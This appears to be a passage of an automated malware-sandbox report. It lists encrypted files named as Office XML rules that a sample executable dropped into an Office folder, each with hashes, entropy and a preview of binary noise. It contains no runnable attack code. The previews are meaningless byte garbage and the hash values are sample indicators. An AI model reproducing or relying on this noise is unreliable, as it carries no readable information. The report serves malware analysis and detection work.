                                                                                                                                                  Preview:<Rule.M..z....J;.D.yt.C.N..[..o=....T~R..S[q...A....r.B.....U.....[.3."...*.%.K.Owt...j...G...(.?mc.[!....q.E.X.Fho..2.w....4p.N.n.w_...<.U..].^`|.....1.....;...=.x7+aN~..........s.9.&{./...+L..%z..mwk.I|.G%-ZoF..mX?...R?..z.pS.s}.#.....r..U..d1.Oh%....l...%6&M%..\r.&T...J..l....+...YX.`......p...."........ ..d....3.]..-{=...g...M.[Y..#..q......4K.<.<.'Gj.~jdq..j..l..R2.c..T....pl.a.......7..-.s..i...-..^..B.=tI..!#.~Z2j.<..F.........+&E.*......7u..|...ED..I........S.hW.%h.<)$...7.....`)4..cMR$..}{q...B...^W.P..'...4.K'.....X..c.~....KTS..p..H.1j..9#J[4.*z..qm..0.&.$7c.Ew.;..?./......i..g..R..$...W......9(.C..}..%e.m.X.....n:P..&..s....\..../.~..h.IJ.c....C4.M2lM.wY+..u.F.[gg.r....Fy....|u.G@e.tTI...9.O...........*...j7...6...}..1.j.....]c..e.........N..+..).mI..0_|.NdB..4`+t..zf.(...(..T......A3.u.p.c$...U...Jd...9k{.|.Q0.......j....J..s7....%?^....B...A3qA.yr.E......I.!...#....<.=Gk.........bjS..LGp.@2Y...K...<.5.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule1000v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1928
                                                                                                                                                  Entropy (8bit):7.909466499984559
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9EpCAlV5YCm3W8L83lS+hy3jcEfXiYIEjsUD4SiRmQHD:9EpxGrLA1jhE5fnIMxwh
                                                                                                                                                  MD5:83D238BC7CF3FEFBAD8B0A29A0BE54A3
                                                                                                                                                  SHA1:5AD59E7DFFF0B256B02DCD9F36AB307FE05857A1
                                                                                                                                                  SHA-256:CAA70694960C9A4F09D119ACF97A207A13672E033D705555B509B263FCE5D308
                                                                                                                                                  SHA-512:A31A6C133453BB4300A396EFE0185BD5C3553AAC2EA90F4669E253F554C01AB3F1012AE7185F938F745123536861286C9A922B38EA477769286F7A20004B8149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3..6..&.x...J.5;j..a,.B#.;6....%.$1.C.X&..{#.^..c.J....&cj...H.E...1f...C#..r.-d<.Z...6....*...._$.z...fg~.c..._..C%..6.A...L....4.`,.....X.zE.S.U#N......x.e=.`.5..9....g.@q...:...2EK.l.h.gR.k5<...._.F[....uh.s....K...6.p......UC...\+..........Y.d.mWk...G........d...D..J>.Y.;..X~..4..I...r..V...z....A.i1i..~.......5...1.\..\."'.%...4..=nP..&..]..{0^.....CC..'.:.0....}kK...4_.!.......2.9Y.$J..|..f........'S8W..`....<..X.H..u......(....4*Z...K?.F..D..f...*..O.3`..vc.Z..F........x....83....*.U.......{[XLd....D..8'.....2-?km.O...<...`.bkWp...{......|.=4.I.wa...[`N..U.jH..&`6P.#X..$..!.p..r#.[.]...(/J4.k..a..T!M.-..}.BD&........w..5..@S$../d........(.*.Q...icKM_X@.........9.m.Q.....s-..n~...w9..p.ra...!...M ...w..;.;e[......?.......o.......RP..O*t....y....Q.u.P..b.v.eG..2~.nTi.z.[....=t._y.X...}..e..Co..s....V6>,.1.'.....j......X..E..=&6..F.mT.s....`. ...y.].8..........l2.B..3.5]./.......z.y..T.!S...~{...&$Z.v.M....;N/..<..t.6{s...Ptsj....Z..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10450v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1387
                                                                                                                                                  Entropy (8bit):7.87549769789032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IIF3NeeLT2xpaqQsPisOCkPkF99XMY9GNTq147yfcxFdopFaecYoeV2bD:pFHLNrOiNCkPkFzMsGI47yfgfopFdcND
                                                                                                                                                  MD5:3E63BD0D2D43CB22411A976BE5B25227
                                                                                                                                                  SHA1:FF3E241FF20139AB178F2E5BD3D5E8206AE2E482
                                                                                                                                                  SHA-256:20AD7DE8D6725214B9353B2D65BDC5AE9DE9CF5F42ADF1E20A9A5CBA9DD5C4E2
                                                                                                                                                  SHA-512:6E6E2A41D103D4EF236C847F7A23D066794D639D895CEE31C183F440D7E933C2002E16006A45EC5FA48A76D23957802C9663545E56F54EE9CE72572DE684FA31
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlGf...ZC6...D.X..$....J.&m.O.ZkwD]..hl.....[...\.........:...........fvZ(.'..%#=...tM..B...%B..V.<....cO.E../.{4....3.>.+;..v....}.c...e.!...0I.M..i...G.[.+Qz......+TZ!.C.z.Gh_..5...<lp.)..G...i[.6:G.y#K.ma...e.4V..;..V..|w........p......*o.m..=...8.H.....C.. l..............".;.v(2.U"..G@./O{......k..r...y3..z....v.)..C....b..',o.?^5.<...A`).O..2...sx......i.W.c.N%Ig.d_...O..5..W..y......$.....}._...U...{.)X..r.s.];9.....$.5.S........EA.~h......2L.!...aq.K?....2-WP.m..4[...i............{...H.Po..3g.c......B..Xk|..w6..[..z!.).O.......t.9.4)....-z\...].y....,-...._Rw..}.%x0......f.!.....#]O..?f.q..P....6y..Vw/......&E@KH...L..~..O/{........8w......q.J..H;...b......%....3GF"LK.........+..T.v`...S@..J3.........2=.".!.v.6I..../..V...D.....\D.N.2o..?,t....D.......r.;7.....l..nh..JaJ.i.1.zLg....._L.;.....h|.....Mm.Y..S....<...8e.Z.....-....@.7...ik.@.."...(....k...cO.....E.wi.g.5...D....@..|..R2*).7.j$z.*"N.......I....."Uy...z..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10625v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3024
                                                                                                                                                  Entropy (8bit):7.935304880136388
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:MO37MKqZM6C/15vJsk5/XcR31qGyAwVlRMI7xi0IuIeM5H1CpKp5sPCyuiVVnch/:dVqZM9/Dvyk5vcR3MZjRMIbIuIzH1+KR
                                                                                                                                                  MD5:BDDC4B079E18CE3F88C1C73623CD9FFF
                                                                                                                                                  SHA1:8A168E7400B93F2E9C2AD7B6E4F8B28D9810E4A5
                                                                                                                                                  SHA-256:7B57124143F34FCB080B7DE4271352ADEFF5D9E95F6B6F834EEE9EBFD04B7438
                                                                                                                                                  SHA-512:2C972BE830742769FAF781A4408349B71270B55F56DB19BE08BE0F1E5E94BB7A2C38B24EDD14981908EDE1C44E21E9BDA20E63DC113928D7C33169972D48CBBA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.=....M>>S..7.h..e.[....PG:.........|....Gyd..;....{..r.@..f...fPD.e.H.<.,...........[..u.].e^..).I.9...xX.a..iX..#n...l@@..Y..?...]...h ..X.hm..w<.&..._n_.f$]...^.8..qG.&I.....{PS....7.c.z.]..H.4s....2..=..x.$B3.........9..(....6.a.....D.DD....1..+J.t...4f4...9.N....O<<.r....u.fHK<..W.25..Y0{.]....G].Fd.[+ 2.3..I.....N..F..T'L.N...N..^pk.r.T?.2_u...........;....#k!..[].*F..cD..Y.&.iMI<.8M.d...&.l..l.>.k`.2....d..0..S....`.*..jDz.....'..........E.cM8....i..'..Dy.x...f.f..KF`S...l%... ...6.w...........oFqpUr.k..?I,....w=..5...}.P.K...w..Wd....?.6..nO.I|.'.l?.l=..]W0..>.DN9...J$A......X...B..5l}k......l......|..._.qB.cC..T......g.o.........".sNdRD..O=..}.m....9,x..CIr.~4i.....6.Bk......#....V...<.....i;.....#Xm......g....x_...>...F5.....F.0x{.....% . .C50..SR.&.....t#dM......X.LgvO.k..X,-...J....S..]......=p<..>.Zn...f..UY.....3..2..7=.u.y..w....$_.d.........U%2.~...'D....1#.Gb|r< ......N.@uA...>$".U..Q!..]..8.^....-_......:....H/..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10626v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1675
                                                                                                                                                  Entropy (8bit):7.865511611231914
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9cLqYuu+ea34zpYv17DAx3zuatenlYMW60zOcQD:9AnFNpkDAhub0zO3
                                                                                                                                                  MD5:A4EFF81C61BDE12F1629C357ADEB979B
                                                                                                                                                  SHA1:D1A5807B96FBB41BC4DC91EC54629AD372207027
                                                                                                                                                  SHA-256:1C09445FC8DF8339B773990B0551E700903A8FC55AE504CC35F29A24899E1929
                                                                                                                                                  SHA-512:80E328E6EE0100E04DC292E696C292841C4E5635B894C2C633AAF415730CD7D295D87A300AFA7892909810EAA80045AB07724067E52C42058ECABD691F612E1F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...`.Mg[..BQ.)...E.i..W<nA&.-V.....b......=....:On.7.t..a.f=e.$:7....>.`....=.)..z*E......QC{.B..,..:yf!....FZ.r.z<.'....).......H%.....c.e.!..6...z.3y.wm..wj..t.0.+.L.'.5.Y......`nVn..PX.U~:.1w.. .S..C...gy....ra.W.C...R.K..Lm7..P:....e.gv.j5...> .l.K7v'.p..w.3.(...c@...Q.G6........ ....f.|..X.K..9a|M.1...9.{..&.Rvi.....7....$O...B..1U)..^P.8..(.5.B..T..>...Q...A...z.p.......I.....F... _.?(i..@..Wp...iS2.^S..$...g{..G%X.......b,".pv..@.P....R?.v......F+q...Q...+e.E.8.~j]....l.AIjt._\;..;.8\..........Q.....-..&....%.5'.&.#.~t*.R..x/t2.o.Xb.......Pjm..;V..|EQVI4...CmG.....b.~jpZ7.,...k...g....,<...w?..iS.qG.Q\...0..bC...u>..fO.w.9.....GQ....*.p...r.Z..B.)>B...=.`...=v...<.;J...A.....(hk..A.[...Wt..&..E....4..`K$..k.A6a..F..b.=....dN..,..w.c-....%O..%......6L..Ps.Uj.V.z..x...."...|........?....xo...s..[.lS.MOf...n.;.K.j.fq.....b...1.j.q.uO[...R.ma..@2**.B.Pw&xWf.^.m..tf..`....a.AZ.CuqZR./[.8v..,.....,.vf..R.J....\..&.....k....h3.|...Dvz..ax.f.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10627v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2113
                                                                                                                                                  Entropy (8bit):7.911173645093766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fbxZkI8P51lA7X337/Thy4bgesxTf7nzFxPkiD:FePlck4bNsZrPkq
                                                                                                                                                  MD5:69A4F9EBD241DD66FF76A4CB40CDA8F8
                                                                                                                                                  SHA1:0FFEF1783DDA742BA76D394142822B464FBA1FD1
                                                                                                                                                  SHA-256:E933F70646C81D30C1944A9283251B7F2F81405E50088A3CB38B5C8E9347E0B7
                                                                                                                                                  SHA-512:5BFB577BB525A3692C462C4C9BCDBDA874F77CFF0EB55A949AE6BFA41C1B9724B88586882022B1C787D6550E81F9039F92FA05208711E9A4E3F6EAFCF4EC932E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..!9..f.rVn]e.~...4.u....W...:.p.F.....>..w...Z~e...wn.!.6.nS.m.'i..I............1.D.G<..br...ro.8. qV.{.j..n.[./..4.S._.}..i..a..nk....0..x0../.....k.H..Q|.1N...' ..D...)...\......#.....)~.r.X.).}XTA..G7.."^=`Z.1..P.Y.....~.....O5......Hl.A..q..s0.g:(...kb.......z..Yg.|......rh.....]\.m.L..d...&.G^6.Bvw.../..,t.8...y...~.Ja..].6......@k^.<..r...}t+v-t.z.....V.^C.0W......,":.u..1..?.ZG...,b..x...{....9.C..,..?.rBa.....i..?...]..Q..`ud.......\....2(.d.....).Z.'.fd..m.f..MOW1...&.QWfal...2r.. ....B.f.0......#..uo...........? ).X..7O.....O.Gu..H.O.&'..............i....$..BY...p)..6^.m%..a.}..W...M8.|:...}.5b.....r...E.........../.Q.>k.PI...3.a&K#E..........c...'.qivT.....R.....`.<..EA..[R...d,..O.......\..Ye......U..C..r<....H.Z*.....t..+[..h!./..<.....+.*O.:9j....).ls..q..M.l..duK..:.2-h6...f28.1H.qY......fVqU..@...aw..L.C1^.M.,:0...V.L).b..2*.....b..y..=...X~k...M1K..u.W..l7.A....1\O..K\}..2%.G.h[`O../Y..!X...k..SX.v;d

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10781v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):813
                                                                                                                                                  Entropy (8bit):7.79424378116696
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:1KHdVkR5HopZ2nNWQcXD5TeVxIXIL2A18Fm0SSOXrrsLFf7IWIQXxegMS4ISUdNX:1mVCoEvgZeVGXILzUs7rq9aaU/J2bD
                                                                                                                                                  MD5:D36F6D3EDBEDE6C3CBF587EDB2F1B0BB
                                                                                                                                                  SHA1:9F8C2976B207C04D18F94D9CB04B674A4D98BFC4
                                                                                                                                                  SHA-256:9A88DD153FCDF238796AD05A49D821927AE224678CF276A660820589DFCB62F1
                                                                                                                                                  SHA-512:E7B67340920DD6CE64C42C6A317FE562179214D961517D27BBAF79E03D1AACD2C6B635DB8FB0C82168857326A8D689E990BA0DD141179F71B53E3F6C82EC984C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.R....].7.......H.1.m...z...g....#q....<...\UBC..9.<.\.<.S~.%.y....a..,N_sl.B"o7....DN...+..Tb....B......{zJ...N..|..E4..J..&`Y.'......K.;0..m '..53<.._;vK......C%...2...4......m.SD.)m...5{a........p..Y.6P.b....]........<..L.[........B.~\. .%~....(UC.=.}..n'. ..H..[..G....4..H!e.....`...e. L..5.A@W./..C.....H..i.z.c.....=..+..$...~..1U.|.8..b..h. 6...mXO..0p.{i...+d...i...Y......"=~*..kd0@..].<..3......&..q.u...<.b.d...M..-..a...>.T..SHRi..X..f,....tN.f.k.h./V*?....Q.....qu.H,.......e. ....I.....e.l.[d.)^.Z..s.E........8.<."..O..s...2'.....>m..<....N.&o.^|.<r.......9EW.Zl.s.c.@.4.._..wq.y.j....FCn2t.t.k...p.. =....(......<.@..a..].i..!|...Af@...L.q`...T....G..........5..Vw..%mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10784v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2070
                                                                                                                                                  Entropy (8bit):7.898960889567135
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:NdBY9iRxHcqvwFRn7sRK+PvFadJjE7OyV0C9jMD:LBYS57wFR7f+P9KxKOE02k
                                                                                                                                                  MD5:6494EC35B159B7DB2CBA0FF202E33461
                                                                                                                                                  SHA1:C57191A2EAB7325F30A85DECB144DB15CF012D2A
                                                                                                                                                  SHA-256:267AABD469E9EA965F638B2611BFAB08A65D29BCF776414A4C5A7DB9FC2FD628
                                                                                                                                                  SHA-512:31D0F496EC5E19402AA3B0655E3567EF4454B96595F5AC87335EEDAA63A4E3C1475CF34C4232BC3F0284618A6DDE14704FCFF9D55FE8C70433B46FF81F4F3DC9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....}cg.F...Au.W........,..`...4....g|.@...R...)#.......x...u7.G...:._....7...].(/........L|.......F...x....t..\.........A.....Mj.....0.n?.g..\%..C...a...c'.yl....b.1....J...C.lz.SqWq..G3.. _.z`.....I.OT.!..d.Y..2R.%....{.vr........O..f9K.bO.,L<.^..._.(qG.%IPs.....W.lC..so..n......e..c.....'..N.!.....u........n......U|..)..%.....0!.@...u.r..C..'.C. _.C...Xe_6..(QR..{Ps..^.....^t.A(D.....%...j.:.lj..a..s.....q.7.T~.d.Zy.....:v..2w....qx.wM...e.7.........s.Q.c.H.L.Y.......g*..D....J.d@..$...R...-.u3cS*z|.W.`e...7ay.q...p.d..._...H.`.u.....7.C...i..(t..~.x0..V7|.+.9l.;..V.._...UO.#.g2....9...'.(.a.k........|........MK|.A.....v..re....$Z:./k.<=R.n..P..Yk.$f.....w.W.o..r......7dQ.Wdq.c3rt..E5&..w.up..c..C.T`./.}....1... ..S~.E..8$n.*`..#s....X6....:...s....In....Dikr@.....W#.7@)......t/U.h.EC...9........c.B..(MC.#x.KmS.`...5X[../.Fj=C.~..8Jz..\Mh.yf...d\..]..c-...bY.v...q...jL.[~.....[.9.S8..._.....f.;.....q."...N...c3....l.k........r

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10800v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):789
                                                                                                                                                  Entropy (8bit):7.731075107416547
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WVohZfZyDnSkdvo3euyIlzXeaBFTb23qx2bD:W+5Z3kdvD4NCqKD
                                                                                                                                                  MD5:1474BBBB342237BD35941DBDED244E89
                                                                                                                                                  SHA1:1506F2FD80CA8AFF84AEF3212E348FDA3D9820B5
                                                                                                                                                  SHA-256:36D88ED1DD7E93BFB2D268156FC7D06CAF8168C0ED6A1BD8A5ADEF2878A2F203
                                                                                                                                                  SHA-512:BB1BE557A95DD429A0E69BCC7C940287FE7CD9C35E72E064BDBFEF1EB4DDA0CC57103F4545DCDEEAABF486180146C5BF23C3C8473A6D94F32C561A127EA31FD5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.:....."v.....6......vS.........|E$.".E..lI.o....G.l..>.G..:t..;..w..lV.Z..J#h....7.H.k.b...W|.....^.s.....5.j..q.Z[[...0H.a.......Z..G)q%l.i.}.xc.a..f........G.$1.../_H...dN~MU.....N$.9G.'..C....:..}..-.F7.l.m...$.....9>.(...(.W.=..t&.w,.....GI\|.~....".._.%tQq...@ww..L.w.!..s..9.A/Vz.#.Z..U....9.........^..V......%.k..c.w9.I ..F..MCa.r...v9....$..R.x..lx..rC2.........r..4..8..Tt..,;...A.A....6...4..>..%.,Zh..s....0].'.^@@.`T..Y..t../.C....W)&...!S%.m.V........3%.R..%."...`..;.q.'`.Q..@m.&.....a..W.....\g..@.....6'.?T...O..J....tf..w......K..]..Mc.*.....P."....f=}v.9].}M.....'L..sp.H..^..c.D.2x4h.'.u..Y.?.SG.../....%...4C.).......\.....wSH-.=e...R...^D.FY;.6O/ x.Q.R.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10801v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3017
                                                                                                                                                  Entropy (8bit):7.928392581184148
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gf83ERPAPUH/we9hf9MU4j1vdG2VIihNaNftZyollBF6hBzTmW0Ra9fdvM4EPlLr:uDHoqLMRjFdG2VIOYftZHHm70Ra9fNMh
                                                                                                                                                  MD5:1EFAE925CB2462D49AC62F4427310542
                                                                                                                                                  SHA1:792E9E571069FCC5F8C7CC65390E18ED36193A5D
                                                                                                                                                  SHA-256:DAA65E04ABC8A91DC212D641994B21BBDB0B85463097184D18A6C9B7A14F0778
                                                                                                                                                  SHA-512:E6B4290C48E24BAD47FCEECBB6CB0881A8B0951DB3956C8695EFD4ED770206CFF73AE34F31D50F81729C9CCADB25B88C69B377496C075C94427578C0B1B3476A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...\..y.=6.{.`:&...VAZ..G.fNiIj.^..`.........ECF..rS.[....%..bZ....7....v...lq..<<k...nG.'T...F....2z.<,n......}..J.T../w..}......}.I.~@.n...).$~..F .".5N8w............. ...\..5..3...zl..D%.<.||F......??.l.. ...Azgx..c)....EJz..P.[/.`_....!...5.zn..-j..@ ..(a..%].h..@...............'.fr..L......!.uI7..r.......a..^..6.......M....a.....Co...~q..\@w..:.M%..y.3o...T....1:......D.g..8!....HDl.a.f..Zv.z@ ..C.....fpU3?..8f....T....x..B......`.A......... ...J../E....l..Yk.}...gFO.....sZ....b..vr..=..$*.N.FT.j....v.^z..D....p.....p.....1..($.l...^...Yp...I(.y.`n.L.....9)...u...m3...i.....1......`..{#...B..........C'....37....o..8|./............&.l6...Z..?k.S.z....u.......d.I..0.(.<'....J.rG../.....).(...bbz.'G.=.~..R........%6..f.vf......_&...\Uo..@...h3\...:^........2s....?x]w..>1.."8.[s.L.z.}...&.$+h..TN1..'+.A9..q.y..!..2(.9.P......2>..:.1.X.......l..w.*.t....}F...d..z.5.y...aJ...<.t}...}...J....Ie.....r..yqN.]r...L!

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10802v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3017
                                                                                                                                                  Entropy (8bit):7.937889350699649
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:26ihsnKK6JN+98K4TANPX0lQpOROLJP+bIG//qBWr11EYIJIDDJ6ZeYaf4YvsQaf:shuKXJN+SjTEX0qcRGJWbV/sWpUm3Js5
                                                                                                                                                  MD5:12E3A6772BA84D78BFB77402AAD5C357
                                                                                                                                                  SHA1:BA4104DD3454DDCC5A6A3574468020EDA945D044
                                                                                                                                                  SHA-256:FD099C8AE8B09977F5E7956DB8C993DE90D7E0B7259FC15A73EB783D686F617C
                                                                                                                                                  SHA-512:E53D47A5357B6FF13AF4218108EB975A3E1C5C8DBFE68DFD501E8A048E45504C918B1E014EFC26A5EF8ABE2DDAAC0533AF9D0A33665E843707DF1D1E915A2C59
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmln.=..{S.9....W.*^...D.t.f.S.h......^..'{.`..........W.d.r5.(..u.0.]5.n.GE....I81..>.4...Jd.P*S..m.wo.[...UV.FEWdQ...?M.<).v...7csm(.?<.O...-...<..|[...[..i..B.:..4..?.....mG.L.....O.3.]K..G..........S......FX.[<8/L.F.!!.H8.1SF.....*nl..y....2Y_..A1.0.~?.x..g....N.....7+.a.@.........s.".....Z.@..G{a..!.u.5.....b.woU.).o...gVoR'R..]._...y.d 2+..............|...h."Z...dC.;.....5..z.m.oG.......{.0..MEB"x.....pn&...vl.$.cD.H.Au.P....$~.j?!.b....~.C.-...c.F....@../...s.Y.e%W.3.n....b..fH.e.X.....(3..g....?...6....v..4}.glb...!...eU?...[...oImr=\..K..........}"..n.j;....1...3..P.H.GV.T..oj..p.X)...-....@.9..u.+[.?...K8....../.0..f.)...f.5.E..p.lIv.....j.t....cUp.<.0^....gB....F..B$j<.F....&...8(4r..A.E....l.B\...6|.>...l.....C.....JS.D..'...@.A...........~#..Y.k7hi...b3.CYb.R......-K..X.y?>.n...@i1 w.U...D..!. }s.g.... .h..|.?}|ai.s...c...c#...A0..Y0......'..2.!...y....r<NCNR.;....Z.HW.....fv4.+.Dj.B>...$R>..|y.....Bts.n...69]..\K.HAS.Z...`9..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10803v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4639
                                                                                                                                                  Entropy (8bit):7.961233234156242
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:EhrQ6c0/anX3Ed/xKyV8ZdMGoHDw9yTx9dX5cBQljJo/S:EhrQ6c0QG/xK8auGoHDw9yjDoq
                                                                                                                                                  MD5:30C68DCB1C1624E10D26B44E85AE28A0
                                                                                                                                                  SHA1:2237627C4E891FB2C00C3007EC7A0B50D13D1EA5
                                                                                                                                                  SHA-256:DB01917CD74C3963D534DBB82F43C617B172A4DD3B6F827F95E316D353A468CD
                                                                                                                                                  SHA-512:9810B30C869737FA50BBEFC9741F513E2EF90F0C018C4443F71D72FA441F0063EF532EEC8BC0FEBA197F99D9CEEC7607C31A8BA78FF92B75AA40D88E9BE6FA87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...._....T6....f....l..W.......}......Su..........Cw...7...,S.o0Wm..M..x.(.iKh..q...R'.D.&.....,.._.....>@t.2.aH..q...]...^I....|..&v..;..5...T..b..-..k#..f..h...Q..D.>N.Qv.V.2...9._.pwq.&.L..u..)d.V.........Z.:B.o..8.........P.WL..n...g..7.....p..'.I7..*.....y...F...6o!...a...k.Q>.L....>R...z..J!.....o.hV.].*.i..|]D4....f.l.1..2....@...I...;..B...E....E|...$~.2..z.. .....d0...$..u......o*...C..Y..A........|...6.u...,....)X.FB..W...(.f.*,..N.[.m.....v;...<.~...<IpqI...h....y.Fp.L...o|d.X.L..j..-[.^OX..S@...iM.0.8'.1.....A..u%..$.P.h..;.3R...C.I..#..B./.V.8I^...W`....2.F2-..-..\WZ6..^...B!j.......w+...<...u.l.....5.,.7\.C}..;8.Mv[..'..M.v1rh.V.'....o@lF.h.X:,K.d.B$....s}.d.%..ig1....b.......$*.N..)..7VQ...B...c.....&B.&!#.BZ.@e...............n&...3..6...S.;C.'.).....7!S4[.~a..=}.......t.[.#...g.gj.............B.0...U.\e...k.<.O2.&T`p...?...?........[.....L%..F[~.."Txd.,..j.3......c..u?T......y.......le%Qp.px.4...*...u~UX.*.J.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10807v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1329
                                                                                                                                                  Entropy (8bit):7.8627508231727035
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:uEpU8CukPU4HLUsyF46piP19wTKGApBAYVzxDLN4zLfgYMDI+qV2bD:uEpZRkP55ya6oEGG2Bl+zUpvD
                                                                                                                                                  MD5:42B5F67AB91CBFF9477B290C47644717
                                                                                                                                                  SHA1:3FF06394995F2898B4764F07FA261018959C8FDF
                                                                                                                                                  SHA-256:A2F77F64F76D3D422AACF264E515B00811A66D3B91A3D0A7B72060BBD591BFB4
                                                                                                                                                  SHA-512:8AF95F2D63F22100C0C103A47CA533AC5701E46194E070B3601D876B83DF361B3618803ADB1AA78DFF91B007C564F7A2B4FC59E805EB3234CD1CB521F4421FAA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml4t...,.U.ydc..-..."+>..<....{:Y......w...hM"..ZT.i..{.......=...7...B.B.~.....1K..Jw.G.....be...?..Mm>~5...a.g.[.t..Bx.....1.y...M.g.e^...,..K..}....!...7......M~a.Et7..G...<I?.t?.No..8..d..{....3..r.U.....0.'...)f.'.S..&@...YK6.6Yl.......!...g.vK...Y9....3.`.J....bLX.t.J...b.......;^..k..i..x....%C.$79....;...V`.@.i.R..[.u!<a.5.O.-...8V...(.G....;mC(.3.\..&....J.nj........k...c.......1W..F..x..n...F..........S.$M........R. ...@..@..#..G@...:vj.m..L.SZ.@3.@...>n.$...]....u..u..!.ei.7..)...Wv..[...e..`..[=Dl.O...S....w2.0....re..C[?.Y...k.U..R'Oc.H..]...g.v#.tv...dT..A.qI..S..7.L.....>.q.>l........cyp>.......1.bk:K......9g^.1.7....{..n...-Uyb...[z..Q4.1..~........(<.....6........EB......<..E..{#.6...,1...y..:...H...04..'..8.}.5'.7.,.j.....e....0....3W.c]..0..\~e......8.%..=.6..f..W..MH3K]..al.d.|d;>e....V...z..2...d..\..D:......q..`.h.2...6.....`....6.....->`U..T....%....~..q.......]!0a.x.b<.`Y..en..{#.|C.OL...%.....+E.(.?.9..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10808v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
